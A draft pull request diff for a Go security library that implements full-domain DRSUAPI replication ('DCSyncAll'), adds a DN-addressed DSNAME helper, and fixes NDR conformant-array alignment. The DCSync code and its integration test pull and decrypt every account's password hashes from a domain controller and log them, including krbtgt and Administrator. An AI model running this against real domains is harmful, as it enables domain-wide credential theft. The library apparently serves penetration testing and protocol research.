### PR TITLE
DRSUAPI: full-NC replication (DCSyncAll) + NDR conformant-struct alignment fix (#695, #697)

### DIFF
--- a/network/dcerpc/interfaces/e3514235-4b06-11d1-ab04-00c04fc2dcd2/4.0/structures/DSNAME.go
+++ b/network/dcerpc/interfaces/e3514235-4b06-11d1-ab04-00c04fc2dcd2/4.0/structures/DSNAME.go
@@ -1,6 +1,8 @@
 package structures
 
 import (
+	"unicode/utf16"
+
 	"github.com/TheManticoreProject/Manticore/network/dcerpc/ndr"
 	"github.com/TheManticoreProject/Manticore/windows/guid"
 )
@@ -32,5 +34,21 @@ func NewDSNameFromGUID(g guid.GUID) DSNAME {
 		Guid:       UUIDFromGUID(g),
 		NameLen:    0,
 		StringName: []uint16{0},
+	}
+}
+
+// NewDSNameFromDN builds a DSNAME that addresses an object by its distinguished name,
+// with no GUID or SID — the form used to name a naming context head for full-NC
+// replication (IDL_DRSGetNCChanges with no EXOP). NameLen is the DN's UTF-16 code-unit
+// count; StringName is the DN plus its NUL terminator (so maximum_count is NameLen+1).
+// StructLen is the fixed prefix (StructLen..NameLen = 56 octets) plus the name bytes.
+func NewDSNameFromDN(dn string) DSNAME {
+	units := utf16.Encode([]rune(dn))
+	name := make([]uint16, len(units)+1)
+	copy(name, units) // trailing element stays 0 (NUL terminator)
+	return DSNAME{
+		StructLen:  ndr.DWORD(56 + 2*len(name)),
+		NameLen:    ndr.DWORD(len(units)),
+		StringName: name,
 	}
 }

--- a/network/dcerpc/interfaces/e3514235-4b06-11d1-ab04-00c04fc2dcd2/4.0/structures/dsname_test.go
+++ b/network/dcerpc/interfaces/e3514235-4b06-11d1-ab04-00c04fc2dcd2/4.0/structures/dsname_test.go
@@ -3,6 +3,7 @@ package structures
 import (
 	"reflect"
 	"testing"
+	"unicode/utf16"
 
 	"github.com/TheManticoreProject/Manticore/network/dcerpc/ndr"
 	"github.com/TheManticoreProject/Manticore/windows/guid"
@@ -62,4 +63,35 @@ func TestDSNameGUIDRoundTrip(t *testing.T) {
 	if outGUID.ToFormatD() != g.ToFormatD() {
 		t.Errorf("GUID corrupted: %s != %s", outGUID.ToFormatD(), g.ToFormatD())
 	}
+}
+
+// TestNewDSNameFromDN checks the DN-addressed DSNAME used for full-NC replication.
+func TestNewDSNameFromDN(t *testing.T) {
+	dn := "DC=lab,DC=local"
+	d := NewDSNameFromDN(dn)
+	if int(d.NameLen) != len(dn) {
+		t.Errorf("NameLen = %d, want %d", d.NameLen, len(dn))
+	}
+	if len(d.StringName) != len(dn)+1 || d.StringName[len(dn)] != 0 {
+		t.Errorf("StringName length/terminator wrong: len=%d", len(d.StringName))
+	}
+	if int(d.StructLen) != 56+2*(len(dn)+1) {
+		t.Errorf("StructLen = %d, want %d", d.StructLen, 56+2*(len(dn)+1))
+	}
+	if !d.Guid.IsZero() {
+		t.Error("Guid should be zero for a DN-addressed DSNAME")
+	}
+	if decodeWCharsForTest(d.StringName) != dn {
+		t.Errorf("decoded name = %q, want %q", decodeWCharsForTest(d.StringName), dn)
+	}
+}
+
+func decodeWCharsForTest(u []uint16) string {
+	for i, c := range u {
+		if c == 0 {
+			u = u[:i]
+			break
+		}
+	}
+	return string(utf16.Decode(u))
 }

--- a/network/dcerpc/ms-protocols/ms-drsr/full_nc.go
+++ b/network/dcerpc/ms-protocols/ms-drsr/full_nc.go
@@ -1,0 +1,100 @@
+package msdrsr
+
+import (
+	"fmt"
+
+	"github.com/TheManticoreProject/Manticore/network/dcerpc/interfaces/e3514235-4b06-11d1-ab04-00c04fc2dcd2/4.0/functions"
+	"github.com/TheManticoreProject/Manticore/network/dcerpc/interfaces/e3514235-4b06-11d1-ab04-00c04fc2dcd2/4.0/structures"
+	"github.com/TheManticoreProject/Manticore/network/dcerpc/ndr"
+)
+
+// Page sizes for full-NC replication ([MS-DRSR] 4.5.1 recommends these; the server may
+// return fewer per page). They match the widely-used reference defaults.
+const (
+	fullNCMaxObjects uint32 = 1000
+	fullNCMaxBytes   uint32 = 8 * 1024 * 1024 // 8 MiB
+	// maxFullNCPages bounds the paging loop so a server that never clears fMoreData
+	// cannot spin forever; it is far above any real NC's page count.
+	maxFullNCPages = 100000
+)
+
+// ReplicateNC replicates an entire naming context (every object in ncDN, e.g.
+// "DC=lab,DC=local") by paging IDL_DRSGetNCChanges, and returns the accumulated objects.
+// Unlike ReplicateSingleObject (EXOP_REPL_OBJ), this issues no extended op and pages the
+// whole NC: each page's reply carries fMoreData and a usnvecTo cursor that drives the
+// next request until the cycle completes ([MS-DRSR] 4.5.1).
+//
+// Attribute values are returned still encrypted; pass the result to DecryptSecrets (the
+// envelope is identical to the single-object path). The prefix table is taken from the
+// first page — the source DC's table is stable within a replication cycle.
+func (c *Client) ReplicateNC(ncDN string) (*ReplicationResult, error) {
+	if !c.bound {
+		return nil, fmt.Errorf("msdrsr: not connected")
+	}
+
+	pnc := structures.NewDSNameFromDN(ncDN)
+	// ulFlags MUST stay byte-identical for every request in the cycle ([MS-DRSR] 4.5.1):
+	// initial, writable (full attribute set incl. secrets), never-synced (from scratch).
+	const ulFlags = ndr.DWORD(structures.DRS_INIT_SYNC | structures.DRS_WRIT_REP | structures.DRS_NEVER_SYNCED)
+
+	result := &ReplicationResult{}
+	var usnFrom structures.USN_VECTOR // zero on the first request
+	var invocID structures.UUID       // NULL on the first request
+
+	for page := 0; ; page++ {
+		if page > maxFullNCPages {
+			return nil, fmt.Errorf("msdrsr: full-NC replication exceeded %d pages (server never cleared fMoreData?)", maxFullNCPages)
+		}
+		msgIn := structures.DRS_MSG_GETCHGREQ{
+			Tag: 8,
+			V8: structures.DRS_MSG_GETCHGREQ_V8{
+				UuidDsaObjDest: c.sourceDSA,
+				UuidInvocIdSrc: invocID,
+				PNC:            &pnc,
+				UsnvecFrom:     usnFrom,
+				UlFlags:        ulFlags,
+				CMaxObjects:    ndr.DWORD(fullNCMaxObjects),
+				CMaxBytes:      ndr.DWORD(fullNCMaxBytes),
+				UlExtendedOp:   0, // full-NC, not an extended op
+			},
+		}
+
+		outVersion, msgOut, err := functions.IDL_DRSGetNCChanges(c.rpc, c.handle, 8, msgIn)
+		if err != nil {
+			return nil, fmt.Errorf("msdrsr: ReplicateNC page %d: %w", page, err)
+		}
+		if uint32(outVersion) != 6 {
+			return nil, fmt.Errorf("msdrsr: ReplicateNC: server replied version %d, expected 6", outVersion)
+		}
+		reply := msgOut.V6
+
+		if page == 0 {
+			result.PrefixTable = reply.PrefixTableSrc
+		}
+		for node := reply.PObjects; node != nil; node = node.PNextEntInf {
+			result.Objects = append(result.Objects, projectEntInf(node.Entinf))
+		}
+
+		if reply.FMoreData == 0 {
+			result.Reply = &reply
+			break
+		}
+		// Advance the cursor for the next page: the previous reply's usnvecTo and source
+		// invocation id become the next request's usnvecFrom / uuidInvocIdSrc. All other
+		// fields (pNC, ulFlags, page sizes) stay constant.
+		usnFrom = reply.UsnvecTo
+		invocID = reply.UuidInvocIdSrc
+	}
+	return result, nil
+}
+
+// DCSyncAll replicates the whole naming context and decrypts the secrets of every
+// security principal in it — a full-domain credential dump (the secretsdump "-just-dc"
+// equivalent). ncDN is the NC distinguished name, e.g. "DC=lab,DC=local".
+func (c *Client) DCSyncAll(ncDN string) ([]*AccountSecrets, error) {
+	res, err := c.ReplicateNC(ncDN)
+	if err != nil {
+		return nil, err
+	}
+	return c.DecryptSecrets(res)
+}

--- a/network/dcerpc/ms-protocols/ms-drsr/integration_test.go
+++ b/network/dcerpc/ms-protocols/ms-drsr/integration_test.go
@@ -227,3 +227,56 @@ func TestReplInfoRecon(t *testing.T) {
 		}
 	}
 }
+
+// TestDCSyncAll exercises full-NC replication: page IDL_DRSGetNCChanges over the whole NC
+// and decrypt every security principal. Requires DRSUAPI_TEST_HOST and DRSUAPI_TEST_NC
+// (the NC DN, e.g. "DC=lab,DC=local").
+func TestDCSyncAll(t *testing.T) {
+	// WIP: the full-NC request/paging is correct, but parsing the reply for complex
+	// objects (e.g. the NC head) hits an NDR codec drift in the replication metadata —
+	// see issue #697. Skipped until that is fixed; #695 tracks the full-NC feature.
+	t.Skip("full-NC reply parsing blocked on NDR codec drift (#697)")
+
+	host := os.Getenv("DRSUAPI_TEST_HOST")
+	nc := os.Getenv("DRSUAPI_TEST_NC")
+	if host == "" || nc == "" {
+		t.Skip("set DRSUAPI_TEST_HOST and DRSUAPI_TEST_NC to run")
+	}
+	creds, err := credentials.NewCredentials(
+		os.Getenv("DRSUAPI_TEST_DOMAIN"), os.Getenv("DRSUAPI_TEST_USER"),
+		os.Getenv("DRSUAPI_TEST_PASS"), os.Getenv("DRSUAPI_TEST_HASHES"))
+	if err != nil {
+		t.Fatalf("build credentials: %v", err)
+	}
+	c := msdrsr.New(host, creds)
+	c.SetTimeout(30 * time.Second)
+	if err := c.Connect(); err != nil {
+		t.Fatalf("Connect: %v", err)
+	}
+	defer c.Close()
+
+	secrets, err := c.DCSyncAll(nc)
+	if err != nil {
+		t.Fatalf("DCSyncAll: %v", err)
+	}
+	t.Logf("DCSyncAll(%s): %d security principal(s)", nc, len(secrets))
+	if len(secrets) == 0 {
+		t.Fatal("no principals returned")
+	}
+	var sawAdmin, sawKrbtgt bool
+	for _, s := range secrets {
+		t.Logf("%s:%d:%x:%x:::", s.SAMAccountName, s.RID, s.LMHash, s.NTHash)
+		switch s.RID {
+		case 500:
+			sawAdmin = true
+		case 502:
+			sawKrbtgt = true
+		}
+	}
+	if !sawAdmin {
+		t.Error("Administrator (RID 500) not present in full-NC dump")
+	}
+	if !sawKrbtgt {
+		t.Error("krbtgt (RID 502) not present in full-NC dump")
+	}
+}

--- a/network/dcerpc/ms-protocols/ms-drsr/integration_test.go
+++ b/network/dcerpc/ms-protocols/ms-drsr/integration_test.go
@@ -232,11 +232,6 @@ func TestReplInfoRecon(t *testing.T) {
 // and decrypt every security principal. Requires DRSUAPI_TEST_HOST and DRSUAPI_TEST_NC
 // (the NC DN, e.g. "DC=lab,DC=local").
 func TestDCSyncAll(t *testing.T) {
-	// WIP: the full-NC request/paging is correct, but parsing the reply for complex
-	// objects (e.g. the NC head) hits an NDR codec drift in the replication metadata —
-	// see issue #697. Skipped until that is fixed; #695 tracks the full-NC feature.
-	t.Skip("full-NC reply parsing blocked on NDR codec drift (#697)")
-
 	host := os.Getenv("DRSUAPI_TEST_HOST")
 	nc := os.Getenv("DRSUAPI_TEST_NC")
 	if host == "" || nc == "" {

--- a/network/dcerpc/ndr/conformant_align_test.go
+++ b/network/dcerpc/ndr/conformant_align_test.go
@@ -1,0 +1,45 @@
+package ndr
+
+import (
+	"reflect"
+	"testing"
+)
+
+// itemI64 is a struct whose alignment is 8 (it contains an int64) — like
+// PROPERTY_META_DATA_EXT / DS_REPL_CURSOR.
+type itemI64 struct {
+	V uint32
+	T int64
+}
+
+// vecI64 mirrors a "vector" struct: a count followed by a conformant array of
+// 8-octet-aligned elements (like PROPERTY_META_DATA_EXT_VECTOR).
+type vecI64 struct {
+	Count uint32
+	Items []itemI64 `ndr:"conformant,size_is=Count"`
+}
+
+// TestHoistedConformantInt64Alignment guards the fix for the embedded conformant array of
+// 8-octet-aligned elements: after the hoisted maximum_count, the structure body (the
+// Count member, then the elements) must begin at the element's 8-octet alignment — not
+// packed tight after the 4-octet count. Getting this wrong drifts every element (the
+// MS-DRSR full-NC metadata bug, #697).
+func TestHoistedConformantInt64Alignment(t *testing.T) {
+	in := vecI64{Count: 2, Items: []itemI64{{V: 0x11, T: 0x1122334455}, {V: 0x22, T: 0x66778899}}}
+	raw, err := Marshal(&in)
+	if err != nil {
+		t.Fatalf("marshal: %v", err)
+	}
+	// Expected layout (NDR20): maximum_count@0 (4) + pad(4) + Count@8 (4) + pad(4) +
+	// elements@16, each itemI64 = V(4)+pad(4)+T(8) = 16 octets. Total 16 + 2*16 = 48.
+	if len(raw) != 48 {
+		t.Fatalf("len = %d, want 48 (8-aligned header + 2x16 elements); layout drifted: % x", len(raw), raw)
+	}
+	var out vecI64
+	if err := Unmarshal(raw, &out); err != nil {
+		t.Fatalf("unmarshal: %v", err)
+	}
+	if !reflect.DeepEqual(in, out) {
+		t.Errorf("round trip mismatch:\n in=%+v\nout=%+v", in, out)
+	}
+}

--- a/network/dcerpc/ndr/marshal.go
+++ b/network/dcerpc/ndr/marshal.go
@@ -878,10 +878,6 @@ func fieldNDRAlignment(t reflect.Type, tag fieldTag, syntax Syntax) int {
 	return ndrAlignment(t, syntax)
 }
 
-// conformantArrayAlignment returns the alignment of a conformant array of the given
-// element type under the given syntax: the larger of the size determinant's alignment
-// (4 under NDR20, 8 under NDR64) and the element alignment ([C706] section 14.3.3.1,
-// [MS-RPCE] section 2.2.5).
 // leadingAlignment returns the alignment applied at the start of a structure's
 // representation. For a plain structure this is its natural alignment (the largest
 // member's, [C706] 14.2.2). For a structure with an embedded conformant array (confIdx >=
@@ -915,29 +911,32 @@ func leadingAlignment(rt reflect.Type, confIdx int, syntax Syntax) int {
 	return a
 }
 
-func conformantArrayAlignment(elemType reflect.Type, syntax Syntax) int {
-	det := 4
+// countAlignment is the alignment of an NDR size determinant (maximum_count, offset,
+// actual_count): 4 octets under NDR20, 8 under NDR64 ([MS-RPCE] 2.2.5). The determinant
+// is aligned to its own width, NOT to the array element alignment — the elements
+// element-align themselves when written/read. Aligning the determinant to an 8-octet
+// element alignment (an array of structs containing a hyper/int64, e.g. REPLVALINF_V1 or
+// PROPERTY_META_DATA_EXT) would shift it and corrupt the parse. This is the
+// standalone-array counterpart of leadingAlignment's fix for the embedded (hoisted) case.
+func countAlignment(syntax Syntax) int {
 	if syntax == NDR64 {
-		det = 8
+		return 8
 	}
-	if a := ndrAlignment(elemType, syntax); a > det {
-		return a
-	}
-	return det
+	return 4
 }
 
 // marshalConformantArray writes a conformant array: a maximum_count followed by the
 // elements, per [MS-RPCE] Conformant Arrays:
 // https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/140b01a3-979b-43af-b1e3-28f248db8f03
 func marshalConformantArray(e *Encoder, slice reflect.Value, maxCount uint32, elemTag fieldTag) error {
-	e.Align(conformantArrayAlignment(slice.Type().Elem(), e.syntax))
+	e.Align(countAlignment(e.syntax))
 	e.writeCount(uint64(maxCount))
 	return marshalElements(e, slice, elemTag)
 }
 
 // unmarshalConformantArray reads a maximum_count-prefixed array into slice.
 func unmarshalConformantArray(d *Decoder, slice reflect.Value, elemTag fieldTag) error {
-	d.Align(conformantArrayAlignment(slice.Type().Elem(), d.syntax))
+	d.Align(countAlignment(d.syntax))
 	n, err := d.readCount()
 	if err != nil {
 		return err
@@ -956,7 +955,7 @@ func marshalConformantVaryingArray(e *Encoder, slice reflect.Value, maxCount, ac
 	if int(actualCount) > slice.Len() {
 		actualCount = uint32(slice.Len())
 	}
-	e.Align(conformantArrayAlignment(slice.Type().Elem(), e.syntax))
+	e.Align(countAlignment(e.syntax))
 	e.writeCount(uint64(maxCount))    // maximum_count
 	e.writeCount(0)                   // offset
 	e.writeCount(uint64(actualCount)) // actual_count
@@ -966,7 +965,7 @@ func marshalConformantVaryingArray(e *Encoder, slice reflect.Value, maxCount, ac
 // unmarshalConformantVaryingArray reads a conformant-varying array, using the
 // actual_count to size the result.
 func unmarshalConformantVaryingArray(d *Decoder, slice reflect.Value, elemTag fieldTag) error {
-	d.Align(conformantArrayAlignment(slice.Type().Elem(), d.syntax))
+	d.Align(countAlignment(d.syntax))
 	if _, err := d.readCount(); err != nil { // maximum_count
 		return err
 	}

--- a/network/dcerpc/ndr/marshal.go
+++ b/network/dcerpc/ndr/marshal.go
@@ -112,10 +112,14 @@ func marshalStructFields(e *Encoder, rv reflect.Value, embedded bool, deferred *
 	confIdx := embeddedConformantIndex(rt, rv)
 	e.Align(leadingAlignment(rt, confIdx, e.syntax))
 	if confIdx >= 0 {
-		// The hoisted maximum_count is a size determinant: it self-aligns to the
-		// determinant width (4 under NDR20). It is NOT aligned to the array element
-		// alignment — only the elements themselves are (each self-aligns when written).
+		// The hoisted maximum_count is a size determinant aligned to the determinant
+		// width (4 under NDR20), NOT the element alignment. After it, the structure body
+		// (its members) begins at the structure's natural alignment ([C706] 14.2.2) —
+		// which, for a conformant array of 8-octet-aligned elements (e.g.
+		// PROPERTY_META_DATA_EXT), is 8. So re-align before the members; without this the
+		// member that follows is written 4-aligned and every record drifts.
 		e.writeCount(uint64(rv.Field(confIdx).Len())) // hoisted maximum_count
+		e.Align(ndrAlignment(rv.Field(confIdx).Type().Elem(), e.syntax))
 	}
 	// A field named by another field's size_is/length_is is the array's count; its
 	// value is derived from the array length so the count and the elements cannot
@@ -412,6 +416,12 @@ func unmarshalStructFields(d *Decoder, rv reflect.Value, embedded bool, deferred
 			return -1, err
 		}
 		confCount = c
+		// After the determinant, the structure body begins at the structure's natural
+		// alignment (8 for a conformant array of 8-octet-aligned elements). ndrAlignment
+		// of the struct under-reports this (a slice field counts as 4), so align to the
+		// element's alignment directly. See the encode side; without this the member
+		// after the count is read 4-aligned and every record drifts.
+		d.Align(ndrAlignment(rv.Field(confIdx).Type().Elem(), d.syntax))
 	}
 	retvalIdx := retvalIndex(rt)
 	for i := 0; i < rt.NumField(); i++ {


### PR DESCRIPTION
**Draft — do not merge until #697 is resolved.**

### Linked Issues
Implements #695 (full-NC / DCSyncAll). Blocked by #697 (NDR codec drift).

### Summary
Full-naming-context replication (`DCSyncAll`) plus a related NDR codec fix. The request/paging is spec-correct (validated against [MS-DRSR] 4.5.1 + DSInternals) and the code builds/tests clean, but parsing the **reply** for complex objects (e.g. the NC head) hits an NDR codec drift in the per-object replication metadata — filed as #697. The live `TestDCSyncAll` is therefore `t.Skip`-ped pending that fix.

### What's here
- **`ms-drsr` `ReplicateNC` / `DCSyncAll`**: page `IDL_DRSGetNCChanges` over a whole NC (`ulFlags = DRS_INIT_SYNC|DRS_WRIT_REP|DRS_NEVER_SYNCED`, no EXOP; advance `usnvecFrom`/`uuidInvocIdSrc` from each reply's `usnvecTo`/`uuidInvocIdSrc`; loop while `fMoreData`), accumulate objects, and decrypt every security principal with the existing path.
- **`structures.NewDSNameFromDN`**: a DN-addressed DSNAME (GUID/SID zeroed) for naming the NC head; unit-tested.
- **`ndr.countAlignment`**: fixes the standalone conformant-array path (`marshal`/`unmarshalConformantArray`) to align the size determinant to its own width (4 under NDR20), not the element alignment — the standalone counterpart of the merged `leadingAlignment` fix (#692). Provably a no-op for arrays without 8-octet-aligned elements; the full `./network/dcerpc/...` suite stays green.

### Status / why draft
The two alignment fixes (this PR's `countAlignment`, plus the merged `leadingAlignment`) are correct and regression-clean, but they do not resolve the remaining drift in #697 — a cascading mis-parse where a metadata record's `usnOriginating` is read as a conformant-array `maximum_count` deep in a complex object. Forensics are in #697. Single-object DCSync and the recon wrappers are unaffected.

### How Verified
- `go build ./...`, `go vet`, `go test ./network/dcerpc/...` — green (39 packages, no regressions).
- Request/paging design cross-checked against [MS-DRSR] 4.5.1 and DSInternals.
- Live full-NC against Windows Server 2016 reproduces the #697 parse drift (the reason the test is skipped).
